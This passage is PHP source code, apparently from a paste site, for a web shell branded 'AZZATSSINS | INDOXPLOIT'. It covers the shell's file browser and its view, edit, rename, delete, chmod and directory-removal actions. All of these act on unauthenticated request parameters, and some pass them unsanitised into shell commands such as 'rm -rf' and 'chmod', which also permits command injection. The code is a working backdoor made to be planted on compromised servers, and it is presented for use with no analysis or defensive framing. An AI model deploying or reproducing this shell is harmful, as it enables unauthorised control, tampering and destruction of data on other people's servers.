  1754. echo "<font color=lime>Chmod to ".$kntl." Successfully</font><br>";
  1755.  
  1756. }
  1757. } elseif($_GET['act'] == 'delete_dir') {
  1758.     if(is_dir($dir)) {
  1759.         if(is_writable($dir)) {
  1760.             @rmdir($dir);
  1761.             @exe("rm -rf $dir");
  1762.             @exe("rmdir /s /q $dir");
  1763.             rmdir($dir);
  1764.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1765.         } else {
  1766.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1767.         }
  1768.     }
  1769.     echo $act;
  1770. } elseif($_GET['act'] == 'view') {
  1771.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a
  1772. href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a
  1773. href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a
  1774. href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1775.     echo "<fieldset><pre>".htmlspecialchars(@file_get_contents($_GET['file']))."</pre></fieldset>";
  1776. }
  1777. elseif($_GET['act'] == 'chmod') {
  1778. echo "<form method=post><input type='text' name='jmbt' value='".$_GET['file']."'> >> <input type='text' name='kntl' value='0755'><input type='submit'
  1779. value='Chmod' name='azztssns'></form><br>";
  1780. if($_POST['azztssns']) {
  1781. $jmbt = $_POST['jmbt'];
  1782. $kntl = $_POST['kntl'];
  1783. exe("chmod ".$kntl." ".$jmbt);
  1784. echo "<font color=lime>Chmod to ".$kntl." Successfully</font><br>";
  1785.  
  1786. }
  1787. }
  1788.  elseif($_GET['act'] == 'edit') {
  1789.     if($_POST['save']) {
  1790.         $save = file_put_contents($_GET['file'], $_POST['src']);
  1791.         if($save) {
  1792.             $act = "<font color=lime>Saved!</font>";
  1793.         } else {
  1794.             $act = "<font color=red>permission denied</font>";
  1795.         }
  1796.     echo "".$act."<br>";
  1797.     }
  1798.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a
  1799. href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a
  1800. href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a
  1801. href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1802.     echo "<form method='post'>
  1803.    <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1804.    <input type='submit' value='Save' name='save' style='width: 500px;'>
  1805.    </form>";
  1806. } elseif($_GET['act'] == 'rename') {
  1807.     if($_POST['do_rename']) {
  1808.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  1809.         if($rename) {
  1810.             $act = "<script>window.location='?dir=".$dir."';</script>";
  1811.         } else {
  1812.             $act = "<font color=red>permission denied</font>";
  1813.         }
  1814.     echo "".$act."<br>";
  1815.     }
  1816.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a
  1817. href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a
  1818. href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1819.     echo "<form method='post'>
  1820.    <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  1821.    <input type='submit' name='do_rename' value='rename'>
  1822.    </form>";
  1823. } elseif($_GET['act'] == 'delete') {
  1824.     $delete = unlink($_GET['file']);
  1825.     if($delete) {
  1826.         $act = "<script>window.location='?dir=".$dir."';</script>";
  1827.     } else {
  1828.         $act = "<font color=red>permission denied</font>";
  1829.     }
  1830.     echo $act;
  1831. } else {
  1832.     if(is_dir($dir) === true) {
  1833.         if(!is_readable($dir)) {
  1834.             echo "<font color=red>can't open directory. ( not readable )</font>";
  1835.         } else {
  1836.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1837.            <tr>
  1838.            <th class="th_home"><center>Name</center></th>
  1839.            <th class="th_home"><center>Type</center></th>
  1840.            <th class="th_home"><center>Size</center></th>
  1841.            <th class="th_home"><center>Last Modified</center></th>
  1842.            <th class="th_home"><center>Owner/Group</center></th>
  1843.            <th class="th_home"><center>Permission</center></th>
  1844.            <th class="th_home"><center>Action</center></th>
  1845.            </tr>';
  1846.             $scandir = scandir($dir);
  1847.             foreach($scandir as $dirx) {
  1848.                 $dtype = filetype("$dir/$dirx");
  1849.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  1850.                 if(function_exists('posix_getpwuid')) {
  1851.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  1852.                     $downer = $downer['name'];
  1853.                 } else {
  1854.                     //$downer = $uid;
  1855.                     $downer = fileowner("$dir/$dirx");
  1856.                 }
  1857.                 if(function_exists('posix_getgrgid')) {
  1858.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  1859.                     $dgrp = $dgrp['name'];
  1860.                 } else {
  1861.                     $dgrp = filegroup("$dir/$dirx");
  1862.                 }
  1863.                  if(!is_dir("$dir/$dirx")) continue;
  1864.                  if($dirx === '..') {
  1865.                      $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  1866.                  } elseif($dirx === '.') {
  1867.                      $href = "<a href='?dir=$dir'>$dirx</a>";
  1868.                  } else {
  1869.                      $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  1870.                  }
  1871.                  if($dirx === '.' || $dirx === '..') {
  1872.                      $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  1873.                      } else {
  1874.                      $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a> | <a
  1875. href='?act=chmod_dir&dir=$dir/$dirx'>chmod</a>";
  1876.                  }
  1877.                  echo "<tr>";
  1878.                  echo "<td class='td_home'>$href</td>";
  1879.                 echo "<td class='td_home'><center>$dtype</center></td>";
  1880.                 echo "<td class='td_home'><center>-</center></th></td>";
  1881.                 echo "<td class='td_home'><center>$dtime</center></td>";
  1882.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  1883.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  1884.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  1885.                 echo "</tr>";
  1886.             }
  1887.         }
  1888.     } else {
  1889.         echo "<font color=red>can't open directory.</font>";
  1890.     }
  1891.         foreach($scandir as $file) {
  1892.             $ftype = filetype("$dir/$file");
  1893.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  1894.             $size = filesize("$dir/$file")/1024;
  1895.             $size = round($size,3);
  1896.             if(function_exists('posix_getpwuid')) {
  1897.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  1898.                 $fowner = $fowner['name'];
  1899.             } else {
  1900.                 //$downer = $uid;
  1901.                 $fowner = fileowner("$dir/$file");
  1902.             }
  1903.             if(function_exists('posix_getgrgid')) {
  1904.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  1905.                 $fgrp = $fgrp['name'];
  1906.             } else {
  1907.                 $fgrp = filegroup("$dir/$file");
  1908.             }
  1909.             if($size > 1024) {
  1910.                 $size = round($size/1024,2). 'MB';
  1911.             } else {
  1912.                 $size = $size. 'KB';
  1913.             }
  1914.             if(!is_file("$dir/$file")) continue;
  1915.             echo "<tr>";
  1916.             echo "<td class='td_home'><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  1917.             echo "<td class='td_home'><center>$ftype</center></td>";
  1918.             echo "<td class='td_home'><center>$size</center></td>";
  1919.             echo "<td class='td_home'><center>$ftime</center></td>";
  1920.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  1921.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  1922.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a
  1923. href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a
  1924. href='?act=chmod&dir=$dir&file=$dir/$file'>chmod</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  1925.             echo "</tr>";
  1926.         }
  1927.         echo "</table>";
  1928.         if(!is_readable($dir)) {
  1929.             //
  1930.         } else {
  1931.             echo "<hr>";
  1932.         }
  1933. }
  1934.     echo "<center><br><br><b><i><fieldset><font color=lime size=-20><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>AZZATSSINS |
  1935. INDOXPLOIT</a></font></fieldset></i></b></center>";
  1936. ?>
Add Comment
Please, Sign In to add comment